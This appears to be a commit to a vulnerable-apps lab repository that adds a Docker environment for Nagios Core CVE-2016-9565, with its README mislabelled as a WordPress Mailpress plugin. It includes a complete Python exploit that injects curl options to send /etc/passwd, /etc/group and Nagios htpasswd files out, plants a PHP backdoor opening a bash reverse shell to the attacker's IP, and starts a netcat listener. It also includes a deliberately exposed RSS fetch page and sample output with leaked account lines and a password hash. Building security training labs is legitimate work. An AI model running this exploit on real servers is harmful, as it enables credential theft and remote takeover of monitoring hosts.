(Add Vul: Nagios) 添加Nagios Core < 4.2.2 代码执行漏洞（CVE-2016-9565）

README.md

@@ -56,6 +56,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 * [C](#c)
 * [I](#i)
 * [J](#j)
+* [N](#n)
 * [O](#o)
 * [R](#r)
 * [S](#s)
@@ -82,6 +83,10 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 * [Jenkins](./j/jenkins/)
 * [Joomla!](./j/joomla/)
 
+### [N](./j/)<div id="n"></div>
+
+* [Nagios](./nagios/)
+
 ### [O](./o/)<div id="o"></div>
 
 * [OpenSSL](./o/openssl/)

n/README.md

@@ -0,0 +1,4 @@
+N
+---
+
+* [Nagios](./nagios/)

n/nagios/1/Dockerfile

@@ -0,0 +1,8 @@
+FROM quantumobject/docker-nagios:latest
+
+COPY src/exp.php /usr/local/nagios/share/exp.php
+
+RUN set -x \
+    && sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc \
+    && mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp  \
+    && chown nagios:nagios /usr/local/nagios/share/exp.php

n/nagios/1/README.md

@@ -0,0 +1,98 @@
+## WordPress Mailpress Plugin 远程代码执行漏洞
+
+### 漏洞信息
+
+ * [Nagios Core < 4.2.2 Curl Command Injection/Code Execution](https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html)
+
+Nagios 是一款监控IT基础设施的程序，近日安全研究人员 Dawid Golunski 发现在 Nagios Core 中存在一个代码执行漏洞：攻击者首先伪装成 RSS 订阅源，当受害应用获取 RSS 信息时攻击者将恶意构造的数据传给受害者，程序在处理过程中将恶意数据注入到了 curl 的命令中，进而代码执行。
+
+
+### 漏洞分析
+
+参考: [Nagios Core 代码执行漏洞（CVE-2016-9565）分析](http://paper.seebug.org/146/)
+
+### 镜像信息
+
+类型 | 用户名 | 密码
+:-:|:-:|:-:
+HTTP 基础认证 | nagiosadmin | admin
+Web 路径 | /nagios/ | -
+Web 物理路径 | /usr/local/nagios/share | -
+PoC/Exp 路径 | /nagios/exp.php?url=http://xx.xxx.xxx.xx/ | -
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:n_nagios_1
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8000:80 medicean/vulapps:n_nagios_1
+ ```
+ > `-p 8000:80` 前面的 8000 代表物理机的端口，可随意指定。 
+
+访问: `http://127.0.0.1:8000/nagios/` 出现基础认证框则代表成功
+
+### 使用与利用
+
+#### Exp 使用
+
+> 假定攻击者服务器 IP 地址为：2.2.2.2
+
+1. 在攻击者服务器运行 nagios_cmd_injection.py
+
+ ```
+sudo python nagios_cmd_injection.py 2.2.2.3 9999
+ ```
+
+ > 2.2.2.3 是攻击者监听反弹 shell 的IP地址，可与RSS地址一样
+
+2. 访问 http://xxxx/nagios/exp.php?url=http://2.2.2.2/
+
+ 输入 HTTP 基础认证的账号密码
+
+ > exp.php 是验证漏洞时添加的，真实环境中不存在。注意最后一个 `/`
+
+3. 在攻击者服务器看到如下输出即代表成功 
+
+ ```
+ ➜ sudo python nagios_cmd_injection.py 192.168.30.194 8080
+
+ Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
+ CVE-2016-9565
+ nagios_cmd_injection.py ver. 1.0
+
+ [+] Generating SSL certificate for our python HTTPS web server
+
+ [+] Starting the web server on ports 80 & 443
+
+ [+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)
+
+ [+] Received GET request from Nagios server (192.168.30.xxx) ! Sending redirect to inject our curl payload:
+
+ -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
+
+ [+] Success, curl payload injected! Received data back from the Nagios server 192.168.30.xxx
+
+ [*] Contents of /etc/passwd file from the target:
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ nagios:x:999:999::/usr/local/nagios:
+
+ [*] Contents of /usr/local/nagios/etc/htpasswd.users file:
+
+ nagiosadmin:$apr1$c3z3k5K8$lk.GET0vWb.WWJidJt84o1
+```
+
+### 参考链接
+
+* [Nagios Core < 4.2.2 Curl Command Injection/Code Execution](https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html)
+* [Nagios Core 代码执行漏洞（CVE-2016-9565）分析](http://paper.seebug.org/146/)

n/nagios/1/nagios_cmd_injection.py

@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+intro = """\033[94m
+Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
+CVE-2016-9565
+nagios_cmd_injection.py ver. 1.0
+
+Discovered & Coded by:
+
+Dawid Golunski
+https://legalhackers.com
+\033[0m
+"""
+usage = """
+This PoC exploit can allow well-positioned attackers to extract and write 
+arbitrary files on the Nagios server which can lead to arbitrary code execution
+on Nagios deployments that follow the official Nagios installation guidelines. 
+
+For details, see the full advisory at:
+https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
+
+PoC Video:
+https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
+
+Follow https://twitter.com/dawid_golunski for updates on this advisory.
+
+Remember you can turn the nagios shell into root shell via CVE-2016-9565:
+https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
+
+Usage:
+
+./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]
+
+Disclaimer:
+For testing purposes only. Do no harm.
+
+"""
+
+import os
+import sys
+import time
+import re
+import tornado.httpserver
+import tornado.web
+import tornado.ioloop
+
+exploited  = 0 
+docroot_rw = 0
+
+class MainHandler(tornado.web.RequestHandler):
+
+    def get(self):
+	global exploited
+	if (exploited == 1):
+		self.finish()
+	else:
+		ua  = self.request.headers['User-Agent']
+		if "Magpie" in ua:
+			print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip
+			print  '-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '\n'
+			self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)
+			exploited = 1
+
+    def post(self):        
+        global docroot_rw
+	print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip
+
+	# Extract /etc/passwd from the target 
+        passwd = self.request.files['passwd'][0]['body']
+	print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd
+
+	# Extract /usr/local/nagios/etc/htpasswd.users
+        htauth = self.request.files['htauth'][0]['body']
+	print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth
+
+	# Extract nagios group from /etc/group
+        group = self.request.files['group'][0]['body']
+	for line in group.splitlines():
+	    if "nagios:" in line:
+		nagios_group = line
+		print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group
+	if "www-data" in nagios_group:
+		print "[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)\n"
+		docroot_rw = 1
+
+	# Put backdoor PHP payload within the 'Server' response header so that it gets properly saved via the curl 'trace-ascii'
+	# option. The output trace should contain  an unwrapped line similar to:
+	# 
+	# == Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); ?> is not blacklisted
+	#
+	# which will do the trick as it won't mess up the payload :)
+	self.add_header('Server', backdoor)
+
+	# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via <img src=> tag :)
+	print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
+	self.write(xmldata)
+
+	self.finish()
+	tornado.ioloop.IOLoop.instance().stop()
+
+
+if __name__ == "__main__":
+    global backdoor_path
+    global backdoor
+
+    print intro
+
+    # Set attacker's external IP & port to be used by the reverse shell
+    if len(sys.argv) < 2 :
+	   print usage
+	   sys.exit(2)
+    attacker_ip   = sys.argv[1]
+    if len(sys.argv) == 3 :
+	   attacker_port = sys.argv[1]
+    else:
+	   attacker_port = 8080
+
+    # PHP backdoor to be saved on the target Nagios server
+    backdoor_path = '/usr/local/nagios/share/nagios-backdoor.php'
+    backdoor = """<?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
+
+    # Feed XML containing JavaScript payload that will load the nagios-backdoor.php script
+    global xmldata
+    xmldata = """<?xml version="1.0"?>
+    <rss version="2.0">
+          <channel>
+            <title>Nagios feed with injected JS payload</title>
+            <item>
+              <title>Item 1</title>
+              <description>
+
+                <strong>Feed injected. Here we go </strong> - 
+                loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;) 
+
+                <img src="/nagios/nagios-backdoor.php" onerror="alert('Reverse Shell /nagios/nagios-backdoor.php executed!')">
+
+              </description>
+
+            </item>
+
+          </channel>
+    </rss> """
+
+
+    # Generate SSL cert
+    print "[+] Generating SSL certificate for our python HTTPS web server \n"
+    os.system("echo -e '\n\n\n\n\n\n\n\n\n' | openssl req  -nodes -new -x509  -keyout server.key -out server.cert 2>/dev/null")
+
+    print "[+] Starting the web server on ports 80 & 443 \n"
+    application = tornado.web.Application([
+        (r'/.*', MainHandler)
+    ])
+    application.listen(80)
+    http_server = tornado.httpserver.HTTPServer(
+        application, 
+        ssl_options = {
+            "certfile": os.path.join("./", "server.cert"),
+            "keyfile": os.path.join("./", "server.key"),
+        }
+    )
+    http_server.listen(443)
+
+    print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n"
+    tornado.ioloop.IOLoop.current().start()
+
+    if (docroot_rw == 1):
+	    print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path
+	    print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n"
+	    os.system("nc -v -l -p 8080")
+	    print "\n[+] Shell closed\n"
+
+    print "[+] That's all. Exiting\n"
+
+

n/nagios/1/src/exp.php

@@ -0,0 +1,456 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
+<title>README</title>
+<style type="text/css">
+body {
+  font-family: Helvetica, arial, sans-serif;
+  font-size: 14px;
+  line-height: 1.6;
+  padding-top: 10px;
+  padding-bottom: 10px;
+  background-color: white;
+  padding: 30px; }
+
+body > *:first-child {
+  margin-top: 0 !important; }
+body > *:last-child {
+  margin-bottom: 0 !important; }
+
+a {
+  color: #4183C4; }
+a.absent {
+  color: #cc0000; }
+a.anchor {
+  display: block;
+  padding-left: 30px;
+  margin-left: -30px;
+  cursor: pointer;
+  position: absolute;
+  top: 0;
+  left: 0;
+  bottom: 0; }
+
+h1, h2, h3, h4, h5, h6 {
+  margin: 20px 0 10px;
+  padding: 0;
+  font-weight: bold;
+  -webkit-font-smoothing: antialiased;
+  cursor: text;
+  position: relative; }
+
+h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
+  background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
+  text-decoration: none; }
+
+h1 tt, h1 code {
+  font-size: inherit; }
+
+h2 tt, h2 code {
+  font-size: inherit; }
+
+h3 tt, h3 code {
+  font-size: inherit; }
+
+h4 tt, h4 code {
+  font-size: inherit; }
+
+h5 tt, h5 code {
+  font-size: inherit; }
+
+h6 tt, h6 code {
+  font-size: inherit; }
+
+h1 {
+  font-size: 28px;
+  color: black; }
+
+h2 {
+  font-size: 24px;
+  border-bottom: 1px solid #cccccc;
+  color: black; }
+
+h3 {
+  font-size: 18px; }
+
+h4 {
+  font-size: 16px; }
+
+h5 {
+  font-size: 14px; }
+
+h6 {
+  color: #777777;
+  font-size: 14px; }
+
+p, blockquote, ul, ol, dl, li, table, pre {
+  margin: 15px 0; }
+
+hr {
+  background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
+  border: 0 none;
+  color: #cccccc;
+  height: 4px;
+  padding: 0;
+}
+
+body > h2:first-child {
+  margin-top: 0;
+  padding-top: 0; }
+body > h1:first-child {
+  margin-top: 0;
+  padding-top: 0; }
+  body > h1:first-child + h2 {
+    margin-top: 0;
+    padding-top: 0; }
+body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
+  margin-top: 0;
+  padding-top: 0; }
+
+a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
+  margin-top: 0;
+  padding-top: 0; }
+
+h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
+  margin-top: 0; }
+
+li p.first {
+  display: inline-block; }
+li {
+  margin: 0; }
+ul, ol {
+  padding-left: 30px; }
+
+ul :first-child, ol :first-child {
+  margin-top: 0; }
+
+dl {
+  padding: 0; }
+  dl dt {
+    font-size: 14px;
+    font-weight: bold;
+    font-style: italic;
+    padding: 0;
+    margin: 15px 0 5px; }
+    dl dt:first-child {
+      padding: 0; }
+    dl dt > :first-child {
+      margin-top: 0; }
+    dl dt > :last-child {
+      margin-bottom: 0; }
+  dl dd {
+    margin: 0 0 15px;
+    padding: 0 15px; }
+    dl dd > :first-child {
+      margin-top: 0; }
+    dl dd > :last-child {
+      margin-bottom: 0; }
+
+blockquote {
+  border-left: 4px solid #dddddd;
+  padding: 0 15px;
+  color: #777777; }
+  blockquote > :first-child {
+    margin-top: 0; }
+  blockquote > :last-child {
+    margin-bottom: 0; }
+
+table {
+  padding: 0;border-collapse: collapse; }
+  table tr {
+    border-top: 1px solid #cccccc;
+    background-color: white;
+    margin: 0;
+    padding: 0; }
+    table tr:nth-child(2n) {
+      background-color: #f8f8f8; }
+    table tr th {
+      font-weight: bold;
+      border: 1px solid #cccccc;
+      margin: 0;
+      padding: 6px 13px; }
+    table tr td {
+      border: 1px solid #cccccc;
+      margin: 0;
+      padding: 6px 13px; }
+    table tr th :first-child, table tr td :first-child {
+      margin-top: 0; }
+    table tr th :last-child, table tr td :last-child {
+      margin-bottom: 0; }
+
+img {
+  max-width: 100%; }
+
+span.frame {
+  display: block;
+  overflow: hidden; }
+  span.frame > span {
+    border: 1px solid #dddddd;
+    display: block;
+    float: left;
+    overflow: hidden;
+    margin: 13px 0 0;
+    padding: 7px;
+    width: auto; }
+  span.frame span img {
+    display: block;
+    float: left; }
+  span.frame span span {
+    clear: both;
+    color: #333333;
+    display: block;
+    padding: 5px 0 0; }
+span.align-center {
+  display: block;
+  overflow: hidden;
+  clear: both; }
+  span.align-center > span {
+    display: block;
+    overflow: hidden;
+    margin: 13px auto 0;
+    text-align: center; }
+  span.align-center span img {
+    margin: 0 auto;
+    text-align: center; }
+span.align-right {
+  display: block;
+  overflow: hidden;
+  clear: both; }
+  span.align-right > span {
+    display: block;
+    overflow: hidden;
+    margin: 13px 0 0;
+    text-align: right; }
+  span.align-right span img {
+    margin: 0;
+    text-align: right; }
+span.float-left {
+  display: block;
+  margin-right: 13px;
+  overflow: hidden;
+  float: left; }
+  span.float-left span {
+    margin: 13px 0 0; }
+span.float-right {
+  display: block;
+  margin-left: 13px;
+  overflow: hidden;
+  float: right; }
+  span.float-right > span {
+    display: block;
+    overflow: hidden;
+    margin: 13px auto 0;
+    text-align: right; }
+
+code, tt {
+  margin: 0 2px;
+  padding: 0 5px;
+  white-space: nowrap;
+  border: 1px solid #eaeaea;
+  background-color: #f8f8f8;
+  border-radius: 3px; }
+
+pre code {
+  margin: 0;
+  padding: 0;
+  white-space: pre;
+  border: none;
+  background: transparent; }
+
+.highlight pre {
+  background-color: #f8f8f8;
+  border: 1px solid #cccccc;
+  font-size: 13px;
+  line-height: 19px;
+  overflow: auto;
+  padding: 6px 10px;
+  border-radius: 3px; }
+
+pre {
+  background-color: #f8f8f8;
+  border: 1px solid #cccccc;
+  font-size: 13px;
+  line-height: 19px;
+  overflow: auto;
+  padding: 6px 10px;
+  border-radius: 3px; }
+  pre code, pre tt {
+    background-color: transparent;
+    border: none; }
+
+sup {
+    font-size: 0.83em;
+    vertical-align: super;
+    line-height: 0;
+}
+* {
+    -webkit-print-color-adjust: exact;
+}
+@media screen and (min-width: 914px) {
+    body {
+        width: 854px;
+        margin:0 auto;
+    }
+}
+@media print {
+    table, pre {
+        page-break-inside: avoid;
+    }
+    pre {
+        word-wrap: break-word;
+    }
+}
+</style>
+
+
+</head>
+
+<body>
+
+<h2 id="toc_0">WordPress Mailpress Plugin 远程代码执行漏洞</h2>
+
+<h3 id="toc_1">漏洞信息</h3>
+
+<ul>
+<li><a href="https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html">Nagios Core &lt; 4.2.2 Curl Command Injection/Code Execution</a></li>
+</ul>
+
+<p>Nagios 是一款监控IT基础设施的程序，近日安全研究人员 Dawid Golunski 发现在 Nagios Core 中存在一个代码执行漏洞：攻击者首先伪装成 RSS 订阅源，当受害应用获取 RSS 信息时攻击者将恶意构造的数据传给受害者，程序在处理过程中将恶意数据注入到了 curl 的命令中，进而代码执行。</p>
+
+<h3 id="toc_2">漏洞分析</h3>
+
+<p>参考: <a href="http://paper.seebug.org/146/">Nagios Core 代码执行漏洞（CVE-2016-9565）分析</a></p>
+
+<h3 id="toc_3">镜像信息</h3>
+
+<table>
+<thead>
+<tr>
+<th style="text-align: center">类型</th>
+<th style="text-align: center">用户名</th>
+<th style="text-align: center">密码</th>
+</tr>
+</thead>
+
+<tbody>
+<tr>
+<td style="text-align: center">HTTP 基础认证</td>
+<td style="text-align: center">nagiosadmin</td>
+<td style="text-align: center">admin</td>
+</tr>
+<tr>
+<td style="text-align: center">Web 路径</td>
+<td style="text-align: center">/nagios/</td>
+<td style="text-align: center">-</td>
+</tr>
+<tr>
+<td style="text-align: center">Web 物理路径</td>
+<td style="text-align: center">/usr/local/nagios/share</td>
+<td style="text-align: center">-</td>
+</tr>
+<tr>
+<td style="text-align: center">PoC/Exp 路径</td>
+<td style="text-align: center">/nagios/exp.php?url=http://xx.xxx.xxx.xx/</td>
+<td style="text-align: center">-</td>
+</tr>
+</tbody>
+</table>
+
+<h3 id="toc_4">获取环境:</h3>
+
+<ol>
+<li><p>拉取镜像到本地</p>
+
+<div><pre><code class="language-none">$ docker pull medicean/vulapps:n_nagios_1</code></pre></div></li>
+<li><p>启动环境</p>
+
+<div><pre><code class="language-none">$ docker run -d -p 8000:80 medicean/vulapps:n_nagios_1</code></pre></div>
+
+<blockquote>
+<p><code>-p 8000:80</code> 前面的 8000 代表物理机的端口，可随意指定。 </p>
+</blockquote></li>
+</ol>
+
+<p>访问: <code>http://127.0.0.1:8000/nagios/</code> 出现基础认证框则代表成功</p>
+
+<h3 id="toc_5">使用与利用</h3>
+
+<h4 id="toc_6">Exp 使用</h4>
+
+<blockquote>
+<p>假定攻击者服务器 IP 地址为：2.2.2.2</p>
+</blockquote>
+
+<ol>
+<li><p>在攻击者服务器运行 nagios<em>cmd</em>injection.py</p>
+
+<div><pre><code class="language-none">sudo python nagios_cmd_injection.py 2.2.2.3 9999</code></pre></div>
+
+<blockquote>
+<p>2.2.2.3 是攻击者监听反弹 shell 的IP地址，可与RSS地址一样</p>
+</blockquote></li>
+<li><p>访问 http://xxxx/nagios/exp.php?url=http://2.2.2.2/</p>
+
+<p>输入 HTTP 基础认证的账号密码</p>
+
+<blockquote>
+<p>exp.php 是验证漏洞时添加的，真实环境中不存在。注意最后一个 <code>/</code></p>
+</blockquote></li>
+<li><p>在攻击者服务器看到如下输出即代表成功 </p>
+
+<div><pre><code class="language-none">➜ sudo python nagios_cmd_injection.py 192.168.30.194 8080
+
+Nagios Core &lt; 4.2.0 Curl Command Injection / Code Execution PoC Exploit
+CVE-2016-9565
+nagios_cmd_injection.py ver. 1.0
+
+[+] Generating SSL certificate for our python HTTPS web server
+
+[+] Starting the web server on ports 80 &amp; 443
+
+[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)
+
+[+] Received GET request from Nagios server (192.168.30.xxx) ! Sending redirect to inject our curl payload:
+
+-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
+
+[+] Success, curl payload injected! Received data back from the Nagios server 192.168.30.xxx
+
+[*] Contents of /etc/passwd file from the target:
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+nagios:x:999:999::/usr/local/nagios:
+
+[*] Contents of /usr/local/nagios/etc/htpasswd.users file:
+
+nagiosadmin:$apr1$c3z3k5K8$lk.GET0vWb.WWJidJt84o1</code></pre></div></li>
+</ol>
+<h3 id="toc_7">参考链接</h3>
+<ul>
+<li><a href="https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html">Nagios Core &lt; 4.2.2 Curl Command Injection/Code Execution</a></li>
+<li><a href="http://paper.seebug.org/146/">Nagios Core 代码执行漏洞（CVE-2016-9565）分析</a></li>
+</ul>
+</body>
+</html>
+
+<?php
+// RSS reader
+
+define('MAGPIE_DIR', './includes/rss/');
+define('MAGPIE_CACHE_ON', 0);
+define('MAGPIE_CACHE_AGE', 0);
+define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');
+require(MAGPIE_DIR.'rss_fetch.inc');
+
+$url = "http://blog.evalbug.com/atom.xml";
+if (isset($_REQUEST['url'])) {
+    $url = $_REQUEST['url'];
+}
+
+fetch_rss($url);

n/nagios/README.md

@@ -0,0 +1,4 @@
+Nagios
+---
+
+1. [Nagios Core < 4.2.2 代码执行漏洞（CVE-2016-9565）](1/)